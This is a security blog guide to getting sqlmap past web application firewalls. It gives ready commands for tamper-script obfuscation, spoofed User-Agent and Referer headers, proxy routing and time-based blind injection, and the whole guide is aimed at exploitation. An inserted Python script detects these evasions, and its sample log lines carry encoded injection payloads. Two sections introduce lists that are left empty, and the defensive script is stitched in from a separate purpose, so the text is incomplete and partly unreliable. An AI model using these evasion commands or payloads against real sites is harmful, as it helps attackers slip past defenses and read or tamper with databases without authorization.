Blog | G5 Cyber Security

SQLMAP WAF Bypass Guide

TL;DR

Web Application Firewalls (WAFs) and Intrusion Detection Systems (IDS) often block SQLmap’s default requests. This guide shows techniques to bypass these protections, allowing you to successfully identify and exploit SQL injection vulnerabilities.

1. Understand the Block

Before attempting a bypass, understand *why* SQLmap is being blocked. Common reasons include:

Check server responses (error messages, HTTP status codes) and WAF logs if available.

2. Tamper Scripts

SQLmap’s tamper scripts modify requests to evade detection. They alter the payload without changing its meaning for the database.

  1. List Available Tamper Scripts: Run sqlmap --list-tampers to see the full list of available scripts (the -T option selects database tables to enumerate and does not list tamper scripts).
  2. Apply a Script: Use the --tamper option followed by the script name. For example, to use the ‘space2comment’ script:
    sqlmap -u "http://example.com/vuln?id=1" --tamper space2comment
  3. Combine Scripts: Use multiple tamper scripts for stronger obfuscation:
    sqlmap -u "http://example.com/vuln?id=1" --tamper space2comment,apostrophemask
  4. Commonly Useful Tamper Scripts:
    • space2comment: Replaces spaces with comments (/**/).
    • apostrophemask: Masks single quotes.
    • base64encode: Encodes the payload in base64.
    • hexencode: Encodes the payload in hexadecimal.
    • randomcase: Randomly changes the case of letters.

3. HTTP Request Options

Modify how SQLmap sends requests to avoid detection.

  1. --cookie: Use a valid cookie for authentication and session persistence, which can sometimes bypass checks.
    sqlmap -u "http://example.com/vuln?id=1" --cookie="sessionid=abcdefg"
  2. --user-agent: Change the User-Agent string to mimic a legitimate browser:
    sqlmap -u "http://example.com/vuln?id=1" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
  3. --referer: Set a Referer header to appear as if the request came from another page on the site:
    sqlmap -u "http://example.com/vuln?id=1" --referer="http://example.com/home"
  4. --headers: Add custom HTTP headers.
    sqlmap -u "http://example.com/vuln?id=1" --headers="X-Custom-Header: value"
  5. --proxy: Route traffic through a proxy server to hide your IP address and potentially bypass rate limiting:
    sqlmap -u "http://example.com/vuln?id=1" --proxy="http://your-proxy-ip:port"
  6. --threads: Reduce the number of threads to avoid overwhelming the server and triggering rate limiting:
    sqlmap -u "http://example.com/vuln?id=1" --threads=5

4. Time-Based Blind SQL Injection

If other techniques fail, try time-based blind SQL injection. This is slower but often bypasses WAFs because it doesn’t use typical SQL injection keywords.

  1. Restrict SQLmap to time-based blind tests with --technique=T (there is no --time-based option; --technique selects the injection techniques to use, and T stands for time-based blind):
    sqlmap -u "http://example.com/vuln?id=1" --technique=T --level=5 --risk=3
  2. Adjust Level and Risk: Increase --level (1-5) for more thorough testing, but be aware of increased server load. Adjust --risk (1-3) to control the aggressiveness of the tests.
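Sections 2, 3 and 4 each point at a weakness in naive WAF matching: tamper scripts reshape a payload without changing what the database executes, request headers such as User-Agent and Referer are entirely under the client's control, and time-based payloads carry little beyond a delay function (SLEEP, BENCHMARK, WAITFOR DELAY, pg_sleep) plus an unusually long response. The defensive lesson is the same in all three cases: decode and normalize the request before matching signatures, key findings on observed behaviour rather than on headers, and correlate with response latency. The Python script below is an added example written for this page; it is not part of the original post and is not sqlmap's own code. The log line format, the client addresses, the 3-second latency threshold and the signature patterns are all assumptions chosen for the illustration, and the sample log lines are constructed.

```python
import re
import shlex
import urllib.parse
from collections import defaultdict

# Constructed sample access-log lines (not taken from the original page).
# Assumed format per line: client_ip "user-agent" path?query response_seconds
SAMPLE_LOG = """\
10.0.0.7 "sqlmap/1.x (constructed)" /vuln?id=1 0.12
10.0.0.7 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/91.0" /vuln?id=1%27%2F%2A%2A%2FoR%2F%2A%2A%2F1%3D1 0.15
10.0.0.7 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/91.0" /vuln?id=1%EF%BC%87%2F%2A%2A%2FaNd%2F%2A%2A%2FsLeEp%285%29--%20- 5.21
10.0.0.7 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/91.0" /vuln?id=1%EF%BC%87%2F%2A%2A%2FaNd%2F%2A%2A%2FsLeEp%285%29--%20- 5.18
10.0.0.9 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/91.0" /home 0.05
10.0.0.9 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/91.0" /vuln?id=42 0.11
"""

# Assumed threshold: a request that holds the connection this long while carrying
# a delay function is treated as a time-based probe. Tune to the app's normal p99.
LATENCY_THRESHOLD = 3.0

# Signatures are matched only against the normalized value, so case games,
# comment-for-space substitution and URL encoding do not hide them.
SQLI_SIGNATURES = {
    "boolean-or": re.compile(r"'\s*(?:or|and)\s+\S+\s*=\s*\S+"),
    "union-select": re.compile(r"\bunion\b.*\bselect\b"),
}
DELAY_SIGNATURES = {
    "mysql-sleep": re.compile(r"\b(?:sleep|benchmark)\s*\("),
    "mssql-waitfor": re.compile(r"\bwaitfor\s+delay\b"),
    "postgres-sleep": re.compile(r"\bpg_sleep\s*\("),
}


def normalize(value: str) -> str:
    """Undo the transformations the tamper scripts apply before matching."""
    # Undo URL encoding; repeat a few rounds to cover double encoding.
    for _ in range(3):
        decoded = urllib.parse.unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    # apostrophemask: full-width apostrophe (U+FF07) back to ASCII.
    value = value.replace("\uff07", "'")
    # space2comment: inline comments back to a single space.
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    # randomcase: compare case-insensitively by lowercasing.
    value = value.lower()
    # Collapse runs of whitespace so signatures see one canonical form.
    return re.sub(r"\s+", " ", value).strip()


def parse_line(line: str):
    """Split one constructed log line into its fields."""
    client, user_agent, url, latency = shlex.split(line)
    parts = urllib.parse.urlsplit(url)
    params = urllib.parse.parse_qsl(parts.query, keep_blank_values=True)
    return client, user_agent, parts.path, params, float(latency)


def classify(params, latency: float) -> set:
    """Return the labels a single request earns after normalization."""
    labels = set()
    for _name, raw in params:
        norm = normalize(raw)
        for label, pattern in SQLI_SIGNATURES.items():
            if pattern.search(norm):
                labels.add(label)
        for label, pattern in DELAY_SIGNATURES.items():
            if pattern.search(norm):
                labels.add(label)
                # Delay function plus a slow response: time-based blind probe.
                if latency >= LATENCY_THRESHOLD:
                    labels.add("time-based-blind")
    return labels


def analyze(log_text: str) -> dict:
    """Aggregate findings per client. User-Agent is recorded but never trusted
    for scoring, because the client chooses it freely."""
    findings = defaultdict(
        lambda: {"requests": 0, "flagged": 0, "labels": set(), "user_agents": set()}
    )
    for line in log_text.splitlines():
        if not line.strip():
            continue
        client, user_agent, _path, params, latency = parse_line(line)
        entry = findings[client]
        entry["requests"] += 1
        entry["user_agents"].add(user_agent)
        labels = classify(params, latency)
        if labels:
            entry["flagged"] += 1
            entry["labels"] |= labels
    return dict(findings)


if __name__ == "__main__":
    for client, entry in analyze(SAMPLE_LOG).items():
        print(client, entry["flagged"], "of", entry["requests"], sorted(entry["labels"]))
```

In the constructed log, the client that switches to a browser User-Agent after its first request is still flagged on three of four requests, because the verdict comes from the decoded parameter value and the response time, not from the headers. The same normalize step is what a WAF needs in front of its signature set; without it, the space2comment and randomcase transformations from section 2 are enough to slip past a literal `' or 1=1` rule.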

5. File Upload Bypass

If the vulnerability involves file uploads, WAFs may block specific file extensions or content types. Try these bypasses:

6. Cyber Security Considerations

Always obtain explicit permission before performing any penetration testing or vulnerability scanning on a system you do not own. Unauthorized access is illegal and unethical.
